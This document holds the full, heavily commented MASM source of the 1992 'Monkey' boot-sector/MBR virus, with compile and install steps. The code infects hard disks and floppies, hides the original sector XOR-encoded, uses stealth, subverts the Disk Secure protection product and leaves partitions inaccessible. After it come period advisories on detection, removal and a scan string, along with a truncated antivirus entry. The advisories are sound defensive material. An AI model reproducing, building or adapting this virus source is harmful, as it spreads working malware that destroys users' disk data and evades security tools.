page 70,80                              ; MASM listing-file page layout (lines, columns)
Name Monkey                             ; module name
|
||
|
|
||
|
;*******************************************************
;
; Monkey written at the city of champions
; - Edmonton - by UACVRS - Jan 1992.
;
; Monkey is a full-stealth MBR/boot-sector self-replicating program
; with no payload. It does NOT keep the hard disk's partition table in
; place: when an "infected" computer is booted from a floppy, the C:
; drive is no longer accessible.
;
; To compile: masm monkey (we used MASM 5.0)
; link monkey
; exe2bin monkey.exe monkey.co
; Use NU, or debug to copy monkey.co to the boot
; sector of a floppy. The diskette will not boot
; but will install itself on the hard drive.
;
; Bug: it will corrupt any floppy larger than 1.44 MB (the format
; table below only knows four diskette sizes); this is not deliberate.
;
;*******************************************************
|
||
|
|
||
|
; One flat code segment; CS, DS and ES are all assumed to address it.
; The whole image is a single 512-byte boot sector / MBR.
Code Segment
Assume CS:Code,DS:CODE,ES:CODE
ORG 00H                                 ; offset 0 = first byte of the sector

MAIN:
        JMP INITIAL                     ; 3-byte entry jump; PATCH copies exactly bytes 0-2 into each infected sector
|
||
|
|
||
|
; Bytes 03h-1Eh are never overwritten by PATCH, so an infected floppy
; keeps its original BPB (disk format data); the virus body starts at 1Fh.

ORG 1FH
INT_13 EQU THIS BYTE                    ; resident INT 13h handler; HOOK stores ES:INT_13 at 0:004Ch

;-----------------------------------------------------------------------
; INT_13 - resident INT 13h (disk service) hook.
; Entered through the IVT, so the stack holds the caller's FLAGS/CS/IP.
; In (standard INT 13h): AH = function, DL = drive, DH = head,
;     CX = cylinder/sector, ES:BX = buffer.
; Two jobs:
;   1. On read requests only, if the low byte of the BIOS tick count is
;      below 40h (roughly 1 request in 4), call HANDLE_DISK to infect the
;      drive in DL. HANDLE_DISK uses the caller's ES:BX as its buffer.
;   2. For cylinder 0, sectors 1-2, on the head in [SI] (the track that
;      holds the virus):
;        - reads whose result is the virus sector (COMP_SIG) or a Disk
;          Secure sector (COMP_PA) are re-read from the hiding place
;          chosen by CHSEC and XOR-decoded (stealth);
;        - writes to a hard disk have AH cleared, i.e. they become a
;          disk reset and never reach the media;
;        - writes to a floppy are passed through unchanged.
; Everything else is forwarded to the saved BIOS vector (INT13).
; Returns with RETF 2, so the caller sees the flags (CF = error) of the
; last BIOS call rather than its own pushed FLAGS word.
;-----------------------------------------------------------------------
        PUSH DS
        PUSH SI
        PUSH DI
        PUSH AX
        PUSH CX
        PUSH DX

        CALL SET_HEAD                   ; DS = CS; SI -> FLOPPY_HEAD or HARD_HEAD for drive DL

        CMP AH,02H                      ; only read requests may trigger an infection attempt
        JNZ END_ACTION

        PUSH DX
        SUB AX,AX
        INT 1AH                         ; AH = 0: BIOS tick count in CX:DX

TIME EQU $ + 2                          ; TIME labels the 40h immediate of the CMP below (patchable threshold)
        CMP DL,40H                      ; low tick byte < 40h -> about 64 of 256 requests
        POP DX
        JNB END_ACTION

        CALL HANDLE_DISK                ; try to infect drive DL (overwrites the caller's ES:BX buffer)

END_ACTION:
        POP DX
        POP CX
        POP AX
        POP DI

        PUSH DX                         ; re-save DX, CX, AX: REDIRECT restores them, EXIT_3 discards them
        PUSH CX
        PUSH AX

        CMP CX,03H                      ; CX < 3 <=> cylinder 0, sector 1 or 2 (the virus' home track)
        JNB EXIT_2                      ; any other sector: plain pass-through

        CMP DH,BYTE PTR DS:[SI]         ; same head as the boot sector / MBR ([SI] = 0 in both tables)?
        JNZ EXIT_2                      ; no: pass-through

        CMP AH,02H                      ; read of the home track?
        JZ STEALTH                      ; yes: serve the hidden original instead

        CMP AH,03H                      ; write to the home track?
        JNZ EXIT_2                      ; neither read nor write: pass-through
; YES!
        CMP DL,80H                      ; floppy writes (SYS, FORMAT...) are allowed to hit the real sector
        JB EXIT_2
                                        ; hard disk: AH = 0 turns the write into INT 13h "reset disk";
        SUB AH,AH                       ; the data is silently dropped (original note: "make HD light blink")
        JMP SHORT EXIT_2

STEALTH:
        CALL INT13                      ; perform the real read into ES:BX
        JB EXIT_3                       ; BIOS error: return it unchanged

        CALL COMP_SIG                   ; is the sector just read the virus itself (9219h at 1FAh)?
        JZ REDIRECT

        CALL COMP_PA                    ; or a Disk Secure sector ("Pa" at 119h)?
        JZ REDIRECT

EXIT_0:
        CLC                             ; ordinary sector: success, hand it over as is
        JMP SHORT EXIT_3

REDIRECT:
                                        ; CHSEC keys off byte 14h of the buffer; the virus keeps the
        CALL CHSEC                      ; original bytes 03h-1Eh, so this is the BPB byte of the real sector
                                        ; on floppies (for an MBR it falls back to sector 3). CL = hiding sector.

        MOV DH,BYTE PTR DS:[SI+1]       ; head of the hidden copy

        POP AX                          ; restore AH = 02h, AL = caller's sector count
        CALL INT13                      ; re-read from the hiding place (AL sectors)
        CALL ENCRPT_PBR                 ; XOR 2Eh decode -- only the first 512 bytes of the buffer
        POP CX                          ; restore CX, DX; flags are those of the second read
        POP DX
        JMP SHORT EXIT_4

EXIT_2:
        CALL INT13                      ; forward the (possibly modified) request to the BIOS

EXIT_3:
        POP DS                          ; discard the re-saved AX, CX, DX (DS is restored below)
        POP DS
        POP DS

EXIT_4:
        POP SI
        POP DS
        RETF 0002H                      ; return to the INT 13h caller, dropping its pushed FLAGS
|
||
|
|
||
|
; READ_SEC_1 - read one sector (AH = 02h, AL = 1) from drive DL, head DH,
; cylinder/sector CX into ES:BX; falls through into INT13. CF = BIOS error.
READ_SEC_1:
        MOV AX,0201H

; INT13 - call the saved BIOS INT 13h entry directly, bypassing the IVT
; (and therefore this virus' own INT_13 hook). PUSHF + far CALL through
; the vector emulates the INT instruction. INT13_ADDR is filled by the
; SETUP_NORMAL path of HOOK from 0:004Ch.
INT13 PROC NEAR
        PUSHF
        CALL DWORD PTR CS:INT13_ADDR    ; 4-byte vector at CS:1FCh (see INT13_ADDR)
        RET
INT13 ENDP
|
||
|
|
||
|
HOOK_ENTRY EQU THIS BYTE
;-----------------------------------------------------------------------
; HOOK - one-time installation, reached from INITIAL with DS = SS = 0,
; BX = 0, SP = 7C00h and CS = the segment the sector was loaded into.
;   * INT 12h -> AX = conventional memory size in KB.
;   * HOME_SEC = 1 (normal boot): SHIFT_NORMAL lowers the BIOS memory
;     size word by 1 KB, sets ES = stolen segment + 20h, and the current
;     INT 13h vector (0:004Ch) is copied into INT13_ADDR of the new copy.
;   * HOME_SEC = 2 (this copy was loaded from sector 2, i.e. by a Disk
;     Secure sector patched by HANDLE_DISK): SHIFT_SPECIAL only computes
;     ES. Nothing on this path copies the INT 13h vector into INT13_ADDR;
;     presumably the loader leaves a usable one there -- cannot be
;     confirmed from this file.
;   * IVT entry 13h is pointed at ES:INT_13, the body is copied to ES:0
;     by PATCH, interrupts are re-enabled and control "returns" into
;     BOOT inside the resident copy.
;-----------------------------------------------------------------------
HOOK:
        INT 12H                         ; AX = KB of conventional memory
        MOV SI,004CH                    ; 0:004Ch = INT 13h vector in the IVT
        PUSH SI
        CMP BYTE PTR CS:HOME_SEC,02H    ; loaded from sector 2 (Disk Secure present)?
        JZ SETUP_SPECIAL

SETUP_NORMAL:

        CALL SHIFT_NORMAL               ; memory size -= 1; ES = AX = resident segment

        MOV DI,OFFSET INT13_ADDR
        MOV CX,0002H
        CLD
        REPZ MOVSW                      ; copy the 4-byte INT 13h vector 0:004Ch -> ES:INT13_ADDR

        JMP SHORT STORE_SEGMENT

SETUP_SPECIAL:

        CALL SHIFT_SPECIAL              ; ES = AX = (AX << 6) + 20h; memory size word untouched

STORE_SEGMENT:
        POP SI                          ; SI = 004Ch again
        MOV WORD PTR DS:[SI],OFFSET INT_13 ; IVT[13h].offset = INT_13 (DS is still 0)
        MOV DS:[SI+2],AX                ; IVT[13h].segment = resident segment

PATCH_OVER:

        PUSH CS
        POP DS                          ; DS = CS: PATCH copies from DS
        CALL PATCH                      ; copy bytes 0-2 and 1Fh-1FBh to ES:0000 (BX = 0)
        PUSH ES                         ; far "return" address = ES:JMP_ADDR
        MOV AX,OFFSET JMP_ADDR
        PUSH AX
        STI                             ; interrupts were disabled in INITIAL
        RETF                            ; far jump into BOOT in the resident copy
|
||
|
|
||
|
JMP_ADDR EQU THIS BYTE
;-----------------------------------------------------------------------
; BOOT - runs in the resident copy (CS = the ES computed by HOOK).
; PATCH's final REP MOVSB leaves CX = 0, so ES becomes 0; SP is back at
; 7C00h (every push in HOOK was consumed), so ES:BX = 0:7C00h.
; Pushes 0000:7C00h as a far return address, infects the first hard disk
; (DL = 80h) via HANDLE_DISK, reads the XOR-encoded original boot sector
; / MBR of the boot drive from its hiding place into 0:7C00h, decodes it
; and RETFs into it so the normal boot continues.
; The immediates of MOV CL / MOV DX are patched on disk by HANDLE_DISK
; (BOOT_SEC, BOOT_DISK) with the sector and drive/head of the hidden copy;
; the defaults here are sector 5, drive 0 (A:), head 1.
;-----------------------------------------------------------------------
BOOT:
        MOV ES,CX                       ; CX = 0 -> ES = 0
        MOV BX,SP                       ; BX = 7C00h
        PUSH CX                         ; far return address 0000:7C00h for the final RETF
        PUSH BX

        MOV DX,0080H                    ; first hard disk, head 0
        CALL SET_HEAD                   ; DS = CS; SI -> HARD_HEAD
        CALL HANDLE_DISK                ; infect C: (buffer 0:7C00h); CH = 0 on every exit path

BOOT_SEC EQU $ + 1                      ; labels the 05h immediate: sector of the hidden original
        MOV CL,05H
BOOT_DISK EQU $ + 1                     ; labels the 0100h immediate: DH = head, DL = drive of the hidden original
        MOV DX,0100H

        CALL READ_SEC_1                 ; read the encoded original sector into 0:7C00h

        CALL ENCRPT_PBR                 ; XOR 2Eh decode in place

        RETF                            ; jump to 0000:7C00h = the original boot code
|
||
|
|
||
|
HANDLE_DISK PROC NEAR
;-----------------------------------------------------------------------
; HANDLE_DISK - infect the drive in DL.
; In:  DL = drive; DS = CS; SI -> head table for this drive type
;      ([SI] = head of the boot sector / MBR, [SI+1] = head of the hidden
;      copy, [SI+2] = head used to read sector 2); ES:BX = 512-byte buffer.
; Out: CF of the last INT 13h call; CH = 0; AX, CX, DX and the buffer
;      contents are clobbered; SI is preserved.
; Steps:
;   1. Read cylinder 0, sector 1 on head [SI]. If it already carries the
;      virus marker (COMP_SIG) it is written back unchanged and we leave.
;   2. If it is a Disk Secure sector (COMP_PA): clear the word at 1FAh
;      (described in the original comments as Disk Secure's partition
;      checksum switch), write it back to sector 1, then read sector 2
;      and make sector 2 the virus' home instead of sector 1.
;   3. CHSEC picks the hiding sector; the original sector is XOR-encoded,
;      written to head [SI+1] / that sector, decoded again in the buffer
;      (bytes 03h-1Eh must stay readable), and PATCH overlays the virus
;      code on it.
;   4. BOOT_DISK, BOOT_SEC, HOME_SEC and BOOT_SIG are patched in the
;      buffer, which is then written to the home sector.
; Note: on the "flag already zero" branch below CX has already been
; incremented to 2, so the E_2 write stores the unchanged Disk Secure
; sector into sector 2.
;-----------------------------------------------------------------------

; *** READ SECTOR 1 ***
        SUB CX,CX
        INC CX                          ; CX = 1: cylinder 0, sector 1
        PUSH CX                         ; saved home sector (replaced by 2 on the Disk Secure path)

        MOV DH,[SI]                     ; head of the boot sector / MBR
        CALL READ_SEC_1                 ; direct BIOS read into ES:BX
        JB END_HANDLE_DISK              ; read error: give up

; *** COMPARE ***
        CALL COMP_SIG                   ; word 9219h at 1FAh = already infected
        JZ E_2                          ; yes: rewrite the sector as is and leave

; *** PA? ***
        CALL COMP_PA                    ; "Pa" at 119h = Disk Secure (Padgett Peterson's disksec)?
        JNZ UPDATE_DISK                 ; no: ordinary infection of sector 1

; *** OK? ***
        INC CX                          ; CX = 2 from here on
        CMP WORD PTR ES:[BX+1FAH],00H   ; when this word in disksec is set
                                        ; to 0 disksec does not
                                        ; checksum the partitions (original
                                        ; author's note)
        JZ E_2                          ; already cleared: write back -- to sector 2, since CX = 2 here

        MOV WORD PTR ES:[BX+1FAH],00H   ; disable the checksum
        MOV CL,1H                       ; write the modified Disk Secure sector back to sector 1
        CALL WRITE_SEC_1
        JB END_HANDLE_DISK

; *** YES! READ SECTOR 2 ***
        INC CX                          ; CX = 2: Disk Secure keeps sector 1
        MOV DH,[SI+2]                   ; the virus will live in sector 2 -- read it
        CALL READ_SEC_1
        JB END_HANDLE_DISK              ; read error: give up
        POP AX                          ; drop the saved "1"
        PUSH CX                         ; home sector is now 2

UPDATE_DISK:
        CALL CHSEC                      ; CL = hiding sector for this media (CH = 0)
        CALL ENCRPT_PBR                 ; XOR 2Eh encode the original sector in place
        INC SI                          ; so WRITE_SEC_1 picks [SI+1]: the hiding head
        CALL WRITE_SEC_1                ; store the encoded original
        DEC SI                          ; DEC leaves CF alone, so the JB still tests the write
        JB END_HANDLE_DISK

        CALL ENCRPT_PBR                 ; decode again: bytes 03h-1Eh (floppy BPB) survive PATCH in clear
        PUSH CX
        CALL PATCH                      ; overlay the virus (offsets 0-2 and 1Fh-1FBh); leaves CX = 0
        POP CX                          ; CL = hiding sector again

        PUSH DX
        CMP DL,80H
        JNB E_1                         ; hard disk: keep DL = 80h
        XOR DL,DL                       ; floppy: the boot drive will be A: (DL = 0)
E_1:
        MOV WORD PTR ES:[BX+BOOT_DISK],DX   ; patch BOOT's MOV DX: DH = hiding head (set by WRITE_SEC_1), DL = drive
        POP DX
        MOV BYTE PTR ES:[BX+BOOT_SEC],CL    ; patch BOOT's MOV CL: hiding sector
        POP CX
        PUSH CX                         ; CL = home sector (1 or 2)
        MOV BYTE PTR ES:[BX+OFFSET HOME_SEC],CL
        MOV WORD PTR ES:[BX+OFFSET BOOT_SIG],0AA55H   ; re-store 55 AA: PATCH stops at 1FCh

E_2:
        CALL WRITE_SEC_1                ; write the buffer to cylinder 0, sector CL, head [SI]

END_HANDLE_DISK:
        POP AX                          ; discard the saved home sector
        RET

HANDLE_DISK ENDP
|
||
|
|
||
|
WRITE_SEC_1 PROC NEAR
; WRITE_SEC_1 - write one sector from ES:BX to drive DL, cylinder/sector
; CX, head [SI] (DS = CS). WRITE_SEC_2 is the same with DH already set;
; it is not referenced elsewhere in this file. CF = BIOS error.
        MOV DH,[SI]
WRITE_SEC_2:
        MOV AX,0301H                    ; AH = 03h write, AL = 1 sector
        CALL INT13                      ; straight to the saved BIOS vector
        RET
WRITE_SEC_1 ENDP
|
||
|
|
||
|
COMP_SIG PROC NEAR
; COMP_SIG - ZF set if the sector at ES:BX carries the infection marker:
; the word at offset 1FAh equals 9219h (bytes 19h 92h, see PROG_SIG).
        CMP ES:[BX+OFFSET PROG_SIG],9219H
        RET
COMP_SIG ENDP
|
||
|
|
||
|
COMP_PA PROC NEAR
; COMP_PA - ZF set if the sector at ES:BX looks like Disk Secure: the word
; at offset 119h equals 6150h, i.e. the ASCII bytes "Pa" (50h 61h).
        CMP WORD PTR ES:[BX+119H],6150H ; PA?
        RET
COMP_PA ENDP
|
||
|
|
||
|
HOME_SEC DB 01H                         ; sector (cylinder 0) this copy occupies: 1, or 2 when Disk Secure
                                        ; keeps sector 1. Patched per infection by HANDLE_DISK, read by HOOK.

; Head tables, one per drive type; SET_HEAD points SI at the right one:
;   [SI]   head of the boot sector / MBR the virus replaces
;   [SI+1] head where the XOR-encoded original is hidden
;   [SI+2] head used to read sector 2 on the Disk Secure path
FLOPPY_HEAD DB 00H,01H,01H
HARD_HEAD DB 00H,00H,00H

; Floppy format recognition key used by CHSEC: byte 14h of the boot sector.
; The four values match the high byte of the BPB total-sector word at 13h
; for 360K (720 = 02D0h), 720K (1440 = 05A0h), 1.2M (2400 = 0960h) and
; 1.44M (2880 = 0B40h) media.
; 360 720 1.2 1.44
FLOP_SECT_TABLE DB 02H,05H,09H,0BH
; Sector (on head [SI+1]) where the original boot sector is stashed for the
; matching format; an unrecognised format falls back to sector 3 (CHSEC).
SAVE_SECT_TABLE DB 03H,05H,0EH,0EH
|
||
|
|
||
|
CHSEC PROC NEAR
;-----------------------------------------------------------------------
; CHSEC - choose the sector in which the original boot sector is hidden.
; In:  ES:BX = the sector just read (its byte 14h is the format key);
;      DS = CS (every caller in this file runs after SET_HEAD).
; Out: CL = SAVE_SECT_TABLE entry matching FLOP_SECT_TABLE for byte 14h,
;      or 3 if none of the four values matches. CH = 0 either way (LOOP
;      either runs CX down to 0 or exits with CX = index + 1 <= 4).
;      For a hard-disk MBR byte 14h is normally code, not a BPB field,
;      which is why the write-ups below report sector 3 for hard disks.
; Preserves SI, DI. Clobbers AL, flags.
;-----------------------------------------------------------------------
        PUSH DI
        PUSH SI
        MOV AL,ES:[BX+14H]
        MOV CX,0004H                    ; scan table indices 3, 2, 1, 0
CHSEC_1:
        MOV SI,CX
        DEC SI                          ; SI = CX - 1 = table index
        CMP FLOP_SECT_TABLE[SI],AL
        JZ CHSEC_END_1
        LOOP CHSEC_1
        MOV CL,03H                      ; no match: default hiding sector 3
        JMP SHORT CHSEC_END_2
CHSEC_END_1:
        MOV CL,SAVE_SECT_TABLE[SI]      ; matching hiding sector
CHSEC_END_2:
        POP SI
        POP DI
        RET
CHSEC ENDP
|
||
|
|
||
|
SHIFT_NORMAL PROC NEAR
;-----------------------------------------------------------------------
; SHIFT_NORMAL - reserve the top 1 KB of conventional memory and compute
; the resident segment.
; In:  AX = memory size in KB (INT 12h); DS = 0.
; Out: 0:0413h (BIOS data area memory-size word) = AX - 1;
;      ES = AX = ((AX - 1) << 6) + 20h, i.e. the stolen kilobyte's segment
;      plus 512 bytes. Clobbers CL, flags.
; SHIFT_SPECIAL (called by HOOK when HOME_SEC = 2) skips the size change:
; ES = AX = (AX << 6) + 20h, 512 bytes above the reported top of memory.
; After SHL by 6 AL is a multiple of 40h, so ADD AL,20H cannot carry.
;-----------------------------------------------------------------------
; FIND THE SEGMENT TO HIDE
        DEC AX
        MOV DS:[413H],AX                ; hide 1 KB from DOS

SHIFT_SPECIAL:
        MOV CL,06H
        SHL AX,CL                       ; KB -> paragraphs (x 1024 / 16)
        ADD AL,20H                      ; + 20h paragraphs = 512 bytes
        MOV ES,AX
        RET
SHIFT_NORMAL ENDP
|
||
|
|
||
|
PATCH PROC NEAR                         ; overlay the virus on a 512-byte image at ES:BX, starting at INT_13
;-----------------------------------------------------------------------
; PATCH - copy DS:[1Fh..1FBh] (INT_13 .. PROG_END) to ES:[BX+1Fh], then
; the 3-byte entry jump DS:[0..2] to ES:[BX]. Bytes 03h-1Eh (floppy BPB)
; and 1FCh-1FFh of the target are left as they were.
; Callers: HOOK (DS = CS, BX = 0, ES = resident segment) and HANDLE_DISK
; (DS = CS, ES:BX = sector buffer).
; Relies on DF = 0 because its own CLD is commented out: the callers in
; this file clear it via SETUP_NORMAL's CLD or ENCRPT_PBR's CLD, but the
; SETUP_SPECIAL path of HOOK executes neither before calling PATCH.
; Out: CX = 0; DI advanced; SI preserved.
;-----------------------------------------------------------------------
        PUSH SI
        MOV DI,BX
        MOV SI,OFFSET INT_13
        ADD DI,SI                       ; DI = BX + 1Fh
; CLD
        MOV CX,OFFSET PROG_END - OFFSET INT_13
        REPZ MOVSB                      ; body: 1Fh .. 1FBh

PATCH_JMP:
        MOV DI,BX

        SUB SI,SI
        MOV CL,3H                       ; CH is already 0 after the REP above
        REPZ MOVSB                      ; entry jump: bytes 0 .. 2

        POP SI
        RET
PATCH ENDP
|
||
|
|
||
|
SET_HEAD PROC NEAR
; SET_HEAD - DS = CS, and SI -> the head table for the drive in DL:
; FLOPPY_HEAD for DL < 80h, HARD_HEAD otherwise. Flags are those of the
; CMP DL,80H.
        PUSH CS
        POP DS

        MOV SI,OFFSET FLOPPY_HEAD
        CMP DL,80H
        JB SET_HEAD_EXIT                ; floppy
        MOV SI,OFFSET HARD_HEAD         ; hard disk
SET_HEAD_EXIT:
        RET
SET_HEAD ENDP
|
||
|
|
||
|
INITIAL:
; INITIAL - boot-sector entry, reached from the JMP at offset 0:
; interrupts off, BX = DS = SS = 0, stack top just below the load address
; (SP = 7C00h), then continue in HOOK (which re-enables interrupts).
; The two NOPs after the unconditional jump are never executed.
        CLI
        SUB BX,BX
        MOV DS,BX
        MOV SS,BX
        MOV SP,7C00H
        JMP HOOK
        NOP
        NOP
|
||
|
|
||
|
ENCRPT_PBR:
;-----------------------------------------------------------------------
; ENCRPT_PBR - XOR every byte of the 512-byte buffer at ES:BX with 2Eh,
; in place. XOR is its own inverse, so one call encodes and a second call
; decodes. ENCRPT_CODE labels the immediate key byte of the XOR.
; Preserves AX, CX, DI; leaves DF = 0 (CLD); clobbers flags.
;-----------------------------------------------------------------------
        PUSH DI
        PUSH CX
        PUSH AX

        MOV DI,BX
        MOV CX,200H                     ; 512 bytes

        CLD
ENCRPT_1:
        MOV AL,ES:[DI]
ENCRPT_CODE EQU $ + 0001H               ; the 2Eh below
        XOR AL,2EH
        STOSB                           ; write back to ES:[DI], DI++
        LOOP ENCRPT_1

        POP AX
        POP CX
        POP DI
        RET
|
||
|
|
||
|
|
||
|
ORG 01F4H
;PROG_NAME DB "Monkey"
PROG_NAME DB 6dh,8fh,8eh,8bh,85h,99h    ; "Monkey" (4Dh 6Fh 6Eh 6Bh 65h 79h) with 20h added to each byte;
                                        ; not referenced by any code in this file

ORG 01FAH
PROG_SIG DB 19H,92H                     ; infection marker: word 9219h tested by COMP_SIG

PROG_END EQU THIS BYTE                  ; 1FCh: end of the range PATCH copies

ORG 01FCH
INT13_ADDR DB 00H,00H                   ; in memory: saved 4-byte INT 13h vector (offset here, segment at 1FEh,
                                        ; overlapping BOOT_SIG), written by HOOK's REPZ MOVSW and read by INT13

ORG 01FEH
BOOT_SIG DB 55H,0AAH                    ; boot signature on disk; HANDLE_DISK re-stores it after PATCH
PROG_TAIL EQU THIS BYTE

PROG_LEN EQU OFFSET PROG_END - OFFSET INT_13   ; length of the PATCH copy (1Fh .. 1FBh)

CODE ENDS
END MAIN                                ; entry point = the JMP at offset 0
|
||
|
|
||
|
; from U of A
|
||
|
NEW COMPUTER VIRUS THREAT Posted: July 9, 1992
|
||
|
|
||
|
MONKEY VIRUSES ON PCs
|
||
|
|
||
|
The Monkey viruses are main boot record/boot sector infectors,
derived from the Empire D virus. Two variants of the Monkey virus
have been identified. Of particular concern is the fact that these
viruses can infect computers protected by the Disk Secure program
while causing no noticeable changes. Symptoms of infection on
computers without Disk Secure include a memory reduction and
hard drive partitions that are not accessible after booting
from a floppy disk. When the viruses are active on computers
without Disk Secure, total memory is reduced by 1,024 bytes.
|
||
|
|
||
|
Monkey viruses destroy partition table data. If an infected system
|
||
|
is booted up from a clean boot disk, DOS claims to be unable to
|
||
|
access the hard drive partitions. A DIR C: command will return the
|
||
|
message, "Invalid drive specification."
|
||
|
|
||
|
Detection
|
||
|
|
||
|
The simplest method of detection involves recognizing a 1K
|
||
|
decrease in memory. The DOS commands CHKDSK and MEM will return 1K
|
||
|
less "total conventional memory" than is normal.
|
||
|
|
||
|
Of the popular virus scanning products, only F-PROT version 2.04A
|
||
|
finds the Monkey viruses, calling them a "New variant of Stoned."
|
||
|
It will identify the virus in memory as well. The F-PROT Virstop
|
||
|
driver does not recognize the Monkey viruses on boot-up.
|
||
|
|
||
|
Disk Secure version 1.15a (ds115a.zip) has a version of the CHKSEC
|
||
|
program that will notice the presence of the Monkey viruses. Note
|
||
|
that Disk Secure itself will not detect the infection: it is
|
||
|
important that the CHKSEC command be called from the autoexec.bat
|
||
|
file.
|
||
|
|
||
|
As well, a special program to find and remove the Monkey viruses,
|
||
|
called KILLMONK, has been written at the University of Alberta.
|
||
|
|
||
|
Removal
|
||
|
|
||
|
To clean a hard disk: If you have previously saved a copy of the
|
||
|
clean main boot record (MBR), then this can be restored. (Many
|
||
|
anti-virus products have an automated way of doing this.) If you
|
||
|
don't have a copy of the original MBR, and don't know what values
|
||
|
your partition table should have, then the KILLMONK program will
|
||
|
restore the partition table for you.
|
||
|
|
||
|
To restore diskettes: Use the KILLMONK program.
|
||
|
|
||
|
The newest version of F-PROT (version 2.04A) and the KILLMONK
|
||
|
program, are both available, free of charge, from Computing and
|
||
|
Network Services. Bring a formatted diskette to the Microcomputer
|
||
|
Demonstration Centre (MDC), in the basement of the Bookstore, or a
|
||
|
ready-made diskette can be purchased for $2.00 from the CNS User
|
||
|
Support Centre at 302 General Services Building. These programs
|
||
|
can also be downloaded from the MTS account VIR.
|
||
|
|
||
|
;From: martin@cs.ualberta.ca (Tim Martin; FSO; Soil Sciences)
|
||
|
Subject: WARNING - new viruses, Monkey.1 and Monkey.2 (PC)
|
||
|
Date: 20 Jul 92 09:10:09 GMT
|
||
|
|
||
|
Virus Name: MONKEY.1, MONKEY.2 (Empire variants)
|
||
|
V Status: New
|
||
|
Discovery: February, 1992
|
||
|
Symptoms: Memory reduction, hard drive partitions not accessible on
|
||
|
floppy bootup.
|
||
|
Origin: Alberta, Canada
|
||
|
Eff. Length: 512 bytes
|
||
|
Type Code: BPRtS (Boot and Partition table infector - Resident TOM -
|
||
|
Stealth)
|
||
|
Detection: CHKDSK, F-PROT 2.04, CHKSEC from Disk Secure 1.15, KILLMONK
|
||
|
Removal: Cold boot from a clean, write-protected floppy, then replace the
MBR (hard disk) or boot sector (floppy).
|
||
|
|
||
|
General Comments:
|
||
|
The Monkey viruses are Main Boot Record / Boot Sector infectors,
|
||
|
derived from the Empire D virus. Two variants of the Monkey virus
|
||
|
have been identified: their most obvious difference is in the initial
|
||
|
bytes at offset 0:
|
||
|
Monkey.1: E9 CD 01 (JMP 02D0)
|
||
|
Monkey.2: EB 1E 90 (JMP 0020 ; NOP)
|
||
|
|
||
|
Both variants keep the original sector's data at offset 03h - 1fh. In
|
||
|
boot sectors, this region contains data required to identify the
|
||
|
diskette format. This solves the problem noticed with earlier
|
||
|
variants of Empire, whereby infected 720k diskettes were sometimes
|
||
|
unreadable.
|
||
|
|
||
|
The Monkey viruses take 1k from the top of memory. When active, total
|
||
|
memory will be reduced by 1024 bytes.
|
||
|
|
||
|
The Monkey viruses use stealth to protect both the MBR and diskette
|
||
|
boot sectors. When active in memory, Int 13h calls cannot access the
|
||
|
infected sector of either hard disks or floppies.
|
||
|
|
||
|
The Monkey viruses are not polymorphic. They do not encode any of the
virus body, as some of the earlier Empire variants did. But before
saving the clean MBR or boot sector to its hiding place, the Monkey
viruses do encode that sector with an "XOR 2Eh". This creates a
problem for any disinfecting program that recovers the original boot
sector or MBR by simply copying it back from the hiding place.
|
||
|
|
||
|
When a hard disk is infected, the encoded MBR is put at side 0,
|
||
|
cylinder 0, sector 3.
|
||
|
|
||
|
When a floppy diskette is infected, the original boot sector is placed
|
||
|
in the bottom sector of the root directory. This means directory
|
||
|
entries will be lost only if the root directory is nearly full -- more
|
||
|
than 96 entries on double density diskettes, or more than 208 entries
|
||
|
on high density diskettes. The virus is designed to identify only the
|
||
|
four most common diskette formats. If the diskette is not of a
|
||
|
recognized format, the boot sector is put on side 1, sector 3. I have
|
||
|
no idea what would happen to a 2.88Mb diskette, but I suspect the
|
||
|
virus would damage the File Allocation Table, causing loss of data.
|
||
|
|
||
|
The Monkey viruses do not put any messages on the screen at any time,
but the virus code does contain the string "Monkey" in encoded form,
followed by the two bytes 19h 92h. It may be significant that the Chinese
Year of the Monkey began in February 1992.
|
||
|
|
||
|
The most remarkable characteristic of the Monkey viruses is that they
were designed as an attack on Padgett Peterson's "Disk Secure"
product. When a computer is booted from an infected diskette, the
virus first checks whether Disk Secure is on the hard disk. If it is,
the virus puts itself in sector 2 rather than sector 1, and slightly
modifies Disk Secure so that Disk Secure loads the virus after it
has checked the system and loaded itself. The Monkey viruses then
install themselves above Disk Secure in memory, at offset 200h.
|
||
|
|
||
|
The Monkey viruses do not save the partition table data in place, so
|
||
|
if an infected system is booted from a clean boot disk, DOS claims to
|
||
|
be unable to access the hard drive partitions. A DIR C: command will
|
||
|
return "Invalid drive specification".
|
||
|
|
||
|
Detection:
|
||
|
Of the popular virus scanning products, only F-PROT 2.04 finds the
|
||
|
Monkey viruses, calling them a "New variant of stoned". It will
|
||
|
identify the virus in memory as well. The F-PROT Virstop driver does
|
||
|
not recognise the Monkey viruses, on boot-up.
|
||
|
|
||
|
Disk Secure v. 1.15a (ds115a.zip) has a version of CHKSEC that will
|
||
|
notice the presence of the Monkey viruses. Notice that Disk Secure
|
||
|
itself will not detect the infection: it is important that the CHKSEC
|
||
|
command be called from the autoexec.bat file.
|
||
|
|
||
|
The simplest detection still involves recognizing a 1k decrease in
|
||
|
memory. CHKDSK and MEM will return 1k less "total conventional
|
||
|
memory" than normal.
|
||
|
|
||
|
A special program to find and remove the Monkey viruses, called
|
||
|
KILLMONK, has been written at the University of Alberta. I hope to
|
||
|
make this available to the anti-virus community shortly.
|
||
|
|
||
|
Removal:
|
||
|
The undocumented /MBR option of FDISK does remove the Monkey virus
|
||
|
from the MBR, provided the computer was booted from a clean floppy,
|
||
|
but it does not restore the correct partition table values. The
|
||
|
problem is that the partition table is not in place in sector one: the
|
||
|
table is encoded, in sector 3.
|
||
|
|
||
|
To clean a hard disk: If you have previously saved a copy of the clean
|
||
|
MBR, then this can be restored. (Many anti-virus products have an
|
||
|
automated way of doing this.) If you don't have a copy of the
|
||
|
original MBR, and don't know what values your partition table should
|
||
|
have, then the KILLMONK program may be what you need.
|
||
|
|
||
|
To restore diskettes: Padgett Peterson's FIXFBR works very well,
|
||
|
though it doesn't recognize that the disk is infected. Another
|
||
|
alternative is the KILLMONK program.
|
||
|
|
||
|
Scan String:
The following hexadecimal string is present in both variants of Monkey.
It is taken from the code the virus uses to recognize itself: a compare
of the word at offset 1FAh with 9219h, a RET, then a compare of the word
at offset 119h with 6150h ("Pa", the Disk Secure check).
26 81 bf fa 01 19 92 c3 26 81 bf 19 01 50 61
|
||
|
|
||
|
Tim
|
||
|
|
||
|
; From F-PROT
|
||
|
|
||
|
Name: Monkey
|
||
|
Type: Boot MBR Stealth
|
||
|
|
||
|
The Monkey virus was first discovered in Edmonton, Canada, in the
|
||
|
